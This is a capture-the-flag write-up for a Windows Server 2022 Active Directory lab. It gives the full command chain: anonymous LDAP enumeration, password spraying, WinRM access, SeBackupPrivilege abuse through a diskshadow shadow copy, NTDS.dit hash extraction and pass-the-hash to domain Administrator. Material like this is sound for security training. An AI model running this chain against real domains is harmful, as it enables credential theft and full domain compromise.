HTB Baby — Detailed Solution Notes

Platform: VulnLab | Machine: Baby | OS: Windows Server 2022 | Difficulty: Easy | Vulnerability Types: LDAP Anonymous Bind, Credential in Description Field, SeBackupPrivilege Abuse, NTDS.dit Extraction

How Does a Hacker Think? — From Anonymous LDAP to Domain Admin

Baby looks like a locked door from the outside. There is no web application, no FTP share, no obvious foothold. Every attack here flows from a single overlooked detail: an IT administrator left a plaintext initial password sitting in an LDAP user description field, visible to anyone who connects anonymously. From that one credential, the chain extends through a forced password change, a Backup Operators group membership, and a shadow copy of the domain database — ending with every password hash in the domain.

1. Reconnaissance

Network Scan

nmap -p- --min-rate 5000 10.129.234.71
nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389 -sV -sC 10.129.234.71

The scan returns a textbook Active Directory profile. Port 53 is DNS, port 88 is Kerberos, port 389 and 636 are LDAP and LDAPS, port 445 is SMB with signing required, port 3389 is RDP, and port 5985 is WinRM. The RDP certificate and LDAP banner both confirm the domain: baby.vl, domain controller hostname BabyDC.baby.vl, OS Windows Server 2022 build 20348. SMB signing is enabled and required, which rules out relay attacks immediately.

Hosts File

echo "10.129.234.71 baby.vl BabyDC.baby.vl" >> /etc/hosts

2. LDAP Enumeration — Anonymous Bind

How Does a Hacker Think?

When a domain controller exposes LDAP, the first question is whether anonymous binding is permitted. If it is, the entire user directory becomes readable without credentials. This is not a vulnerability in LDAP itself — it is a misconfiguration. Administrators sometimes enable it for legacy application compatibility and forget it is on. The consequence is that every user object, group membership, and description field in the domain becomes public information.

Anonymous User Enumeration

nxc ldap baby.vl -u '' -p '' --users

Nine users are returned. All are standard except Teresa.Bell, whose description field reads: Set initial password to BabyStart123!

Extended LDAP Dump

ldapsearch -x -b "dc=baby,dc=vl" "*" -H ldap://BabyDC.baby.vl | grep dn

This reveals two additional users not returned by the previous query: Ian.Walker and Caroline.Robinson, both members of the OU=dev and OU=it organisational units respectively.

Users in scope: Jacqueline.Barnett, Ashley.Webb, Hugh.George, Leonard.Dyer, Ian.Walker, Connor.Wilkinson, Joseph.Hughes, Kerry.Wilson, Teresa.Bell, Caroline.Robinson

3. Credential Discovery and Password Spray

How Does a Hacker Think?

A plaintext password in a description field almost certainly belongs to an IT provisioning workflow. An administrator created multiple accounts, set the same initial password for all of them, and wrote it down in a field that was never meant to be public. The natural next step is to test that password against every account in the domain. Even if most users have already changed it, statistically at least one will not have.

Password Spray

nxc smb baby.vl -u users.txt -p 'BabyStart123!' --continue-on-success

All accounts return STATUS_LOGON_FAILURE except one. Caroline.Robinson returns STATUS_PASSWORD_MUST_CHANGE. This means the credential is valid but the account is flagged to force a password change on first login — Caroline never completed the provisioning process.

Forced Password Change

smbpasswd -r 10.129.234.71 -U Caroline.Robinson

Old password: BabyStart123! New password: Password123!

Credentials obtained: Caroline.Robinson : Password123!

4. Initial Foothold — WinRM Shell

evil-winrm -i baby.vl -u Caroline.Robinson -p 'Password123!'

A shell opens immediately. WinRM was exposed on port 5985 and Caroline.Robinson has the necessary remote management rights.

User flag obtained: C:\Users\Caroline.Robinson\Desktop\user.txt ✅

5. Privilege Enumeration — SeBackupPrivilege

How Does a Hacker Think?

The first command after obtaining a shell is always whoami /priv. Privilege tokens determine what the current account can do beyond standard user operations. SeBackupPrivilege is deceptively named — it sounds like it only allows creating backups, but its actual effect is that it bypasses all access control checks on file read operations. Any file on the system, regardless of ACL permissions, can be read by a process holding this privilege. This includes the SAM hive, the SYSTEM hive, and critically, the NTDS.dit Active Directory database.

whoami /priv

The output confirms SeBackupPrivilege and SeRestorePrivilege are both enabled. Caroline.Robinson is a member of the Backup Operators group.

6. SAM and SYSTEM Hive Extraction

The SAM hive contains NTLM hashes for all local accounts. The SYSTEM hive contains the boot key required to decrypt the SAM hive. Neither can be read directly through normal means, but SeBackupPrivilege bypasses that restriction entirely.

reg save HKLM\SAM .\SAM
reg save HKLM\SYSTEM .\SYSTEM

download SAM
download SYSTEM

impacket-secretsdump -sam /home/kali/SAM -system /home/kali/SYSTEM LOCAL

The local Administrator hash is extracted: 8d992faed38128ae85e95fa35868bb43. However, attempting to use this hash for WinRM authentication fails. This is the local machine account hash, not the domain Administrator hash. The domain credentials are stored in NTDS.dit, not in the SAM hive.

7. NTDS.dit Extraction — Volume Shadow Copy

How Does a Hacker Think?

NTDS.dit is the Active Directory database. It contains the credentials for every domain user. The file is always locked by the LSASS process while the domain controller is running, which means it cannot be copied directly. The standard technique is to create a Volume Shadow Copy — a point-in-time snapshot of the drive — and read NTDS.dit from the snapshot, where it is not locked. SeBackupPrivilege gives the necessary access to copy the file out of the shadow copy once it is mounted.

Shadow Copy Creation via Diskshadow

A script file is created on the attack machine and uploaded to the target. The script must use Windows line endings to be parsed correctly by diskshadow.

cat > /home/kali/backup.txt << 'EOF'
set verbose on
set metadata C:\Windows\Temp\test.cab
set context persistent
add volume C: alias cdrive
create
expose %cdrive% E:
EOF
unix2dos /home/kali/backup.txt

upload /home/kali/backup.txt backup.txt
diskshadow /s .\backup.txt

The shadow copy is created and exposed as drive E:.

NTDS.dit Copy

robocopy /b E:\Windows\NTDS . ntds.dit
download ntds.dit

The /b flag instructs robocopy to use backup semantics, which invokes SeBackupPrivilege to bypass the ACL on the file.

8. Domain Hash Extraction and Domain Admin Access

impacket-secretsdump -ntds /home/kali/ntds.dit -system /home/kali/SYSTEM LOCAL

All domain credential hashes are decrypted. The domain Administrator NTLM hash is: ee4457ae59f1e3fbd764e33d9cef123d

Pass-the-Hash

evil-winrm -i baby.vl -u Administrator -H ee4457ae59f1e3fbd764e33d9cef123d

The shell opens as domain Administrator.

Root flag obtained: C:\Users\Administrator\Desktop\root.txt ✅

Core Techniques Used

Anonymous LDAP enumeration exposed the entire user directory without any credentials. Description fields in Active Directory are intended for internal documentation but are readable by any authenticated — or in this case, anonymous — connection to LDAP. A single careless note left by an administrator during account provisioning became the entry point for the entire chain.

Password spraying tested the discovered initial password against all domain users simultaneously. The key constraint is lockout policy — spraying too aggressively locks accounts. A single password across all users is a safe starting point. The STATUS_PASSWORD_MUST_CHANGE response distinguished Caroline.Robinson from the rest and indicated a valid but unconfigured account.

SeBackupPrivilege abuse exploited a privilege that is routinely granted to Backup Operators without full consideration of its implications. The privilege was designed to allow backup software to read any file regardless of permissions. In a security context, it means any member of Backup Operators can read the SAM hive, the SYSTEM hive, and with a shadow copy, the NTDS.dit database.

Volume Shadow Copy via diskshadow bypassed the NTDS.dit file lock. The Active Directory database cannot be copied while the domain controller is running because LSASS holds an exclusive lock on it. Creating a shadow copy produces a frozen snapshot of the drive at that moment — the snapshot's copy of NTDS.dit is not locked by any process and can be read freely.

Pass-the-Hash completed the privilege escalation. The domain Administrator NTLM hash extracted from NTDS.dit was used directly for WinRM authentication without needing to crack the underlying password. NTLM authentication accepts the hash itself as proof of identity.

General Hacker Mindset Summary

Description fields are a data source, not decoration. Any field in Active Directory that a human fills in manually is worth reading. Administrators document things in the closest available text box, and LDAP exposes all of it to anyone who can bind to the directory.

STATUS_PASSWORD_MUST_CHANGE is a green light. When a spray returns this status instead of a logon failure, the credential is correct. The account simply has not been activated yet. Changing the password through a protocol that accepts the old one is trivial and leaves no more noise than a legitimate first login.

Backup Operators is effectively Domain Admin in disguise. Any group membership that grants SeBackupPrivilege on a domain controller should be treated as a path to full domain compromise. The privilege was designed for tape backup software, not for human users — its presence on an interactive account almost always reflects a configuration mistake.

The local SAM and the domain NTDS.dit are different targets. Extracting the local Administrator hash from the SAM hive is useful for lateral movement to other machines that share that password, but it does not grant domain access. Domain credentials live exclusively in NTDS.dit on the domain controller. Understanding the distinction prevents wasted time trying to reuse a local hash against domain services.

Key Topics

Bunları alt başlık olarak kullanabilirsin:

• Anonymous LDAP Bind
• LDAP User Enumeration
• Credential in Description Field
• Password Spraying
• STATUS_PASSWORD_MUST_CHANGE
• Forced Password Change via smbpasswd
• WinRM Shell with evil-winrm
• SeBackupPrivilege
• Backup Operators Group
• SAM and SYSTEM Hive Extraction
• Registry Save via reg save